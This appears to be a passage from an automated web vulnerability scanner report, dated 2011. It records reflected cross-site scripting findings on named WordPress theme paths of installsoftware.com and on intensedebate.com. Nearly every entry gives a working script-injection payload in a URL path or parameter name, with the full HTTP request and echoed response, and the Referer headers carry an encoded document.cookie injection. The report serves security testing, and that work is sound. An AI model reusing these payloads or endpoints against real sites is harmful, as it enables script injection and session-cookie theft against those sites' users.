The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12eeb"><script>alert(1)</script>7d3af0019f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12eeb\"><script>alert(1)</script>7d3af0019f8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css?12eeb"><script>alert(1)</script>7d3af0019f8=1 HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:16:51 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent Last-Modified: Mon, 31 Jan 2011 21:16:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44464
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da186"><script>alert(1)</script>71a56d9e553 was submitted in the REST URL parameter 1. This input was echoed as da186\"><script>alert(1)</script>71a56d9e553 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-contentda186"><script>alert(1)</script>71a56d9e553/themes/rt_mynxx_wp/js/rokmoomenu.js HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:17:48 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:17:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44383
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e18d1"><script>alert(1)</script>7f62ea5354e was submitted in the REST URL parameter 2. This input was echoed as e18d1\"><script>alert(1)</script>7f62ea5354e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themese18d1"><script>alert(1)</script>7f62ea5354e/rt_mynxx_wp/js/rokmoomenu.js HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:18:10 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:18:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44383
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95cca"><script>alert(1)</script>e5cef24f8c9 was submitted in the REST URL parameter 3. This input was echoed as 95cca\"><script>alert(1)</script>e5cef24f8c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp95cca"><script>alert(1)</script>e5cef24f8c9/js/rokmoomenu.js HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:18:21 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:18:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44383
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fe6b"><script>alert(1)</script>4303ea7f066 was submitted in the REST URL parameter 4. This input was echoed as 5fe6b\"><script>alert(1)</script>4303ea7f066 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/js5fe6b"><script>alert(1)</script>4303ea7f066/rokmoomenu.js HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:18:32 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:18:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44383
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 836bc"><script>alert(1)</script>de7ab0e4247 was submitted in the REST URL parameter 5. This input was echoed as 836bc\"><script>alert(1)</script>de7ab0e4247 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js836bc"><script>alert(1)</script>de7ab0e4247 HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:18:44 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:18:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44383
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
1.264. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.installsoftware.com
Path:
/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3993"><script>alert(1)</script>5d956443ee4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e3993\"><script>alert(1)</script>5d956443ee4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js?e3993"><script>alert(1)</script>5d956443ee4=1 HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:16:51 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent Last-Modified: Mon, 31 Jan 2011 21:16:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44418
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d593"><script>alert(1)</script>62b4e4256f9 was submitted in the REST URL parameter 1. This input was echoed as 1d593\"><script>alert(1)</script>62b4e4256f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content1d593"><script>alert(1)</script>62b4e4256f9/themes/rt_mynxx_wp/js/rokutils.js HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:17:02 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:17:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44379
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fabc"><script>alert(1)</script>6b5f665f875 was submitted in the REST URL parameter 2. This input was echoed as 8fabc\"><script>alert(1)</script>6b5f665f875 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes8fabc"><script>alert(1)</script>6b5f665f875/rt_mynxx_wp/js/rokutils.js HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:17:14 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:17:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44379
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13f2e"><script>alert(1)</script>3dcf2e39ba4 was submitted in the REST URL parameter 3. This input was echoed as 13f2e\"><script>alert(1)</script>3dcf2e39ba4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp13f2e"><script>alert(1)</script>3dcf2e39ba4/js/rokutils.js HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:17:25 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:17:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44379
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f9d2"><script>alert(1)</script>e2665a0633f was submitted in the REST URL parameter 4. This input was echoed as 6f9d2\"><script>alert(1)</script>e2665a0633f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/js6f9d2"><script>alert(1)</script>e2665a0633f/rokutils.js HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:17:37 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:17:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44379
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e316"><script>alert(1)</script>78d1f3e19ac was submitted in the REST URL parameter 5. This input was echoed as 5e316\"><script>alert(1)</script>78d1f3e19ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/js/rokutils.js5e316"><script>alert(1)</script>78d1f3e19ac HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:17:48 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:17:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44379
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
1.270. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.installsoftware.com
Path:
/wp-content/themes/rt_mynxx_wp/js/rokutils.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4f0d"><script>alert(1)</script>e67ab689e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d4f0d\"><script>alert(1)</script>e67ab689e6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/js/rokutils.js?d4f0d"><script>alert(1)</script>e67ab689e6=1 HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:15:31 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent Last-Modified: Mon, 31 Jan 2011 21:15:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44412
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cecc3"><script>alert(1)</script>b9fb98d0eae was submitted in the REST URL parameter 1. This input was echoed as cecc3\"><script>alert(1)</script>b9fb98d0eae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xmlrpc.phpcecc3"><script>alert(1)</script>b9fb98d0eae HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:19:11 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:19:11 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44483
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
1.272. http://www.intensedebate.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.intensedebate.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c9021'><script>alert(1)</script>47ba7e7544c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?c9021'><script>alert(1)</script>47ba7e7544c=1 HTTP/1.1 Host: www.intensedebate.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 19:48:02 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 19660
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/?c9021'><script>alert(1)</script>47ba7e7544c=1'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 773e4'><script>alert(1)</script>7211233d828 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /js/genericCommentWrapperV2.js773e4'><script>alert(1)</script>7211233d828 HTTP/1.1 Host: www.intensedebate.com Proxy-Connection: keep-alive Referer: http://www.scmagazineuk.com/microsoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows/article/195310/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 17:16:14 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 4723
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/genericCommentWrapperV2.js773e4'><script>alert(1)</script>7211233d828'> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fc43a'><script>alert(1)</script>5735b3b8c78 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
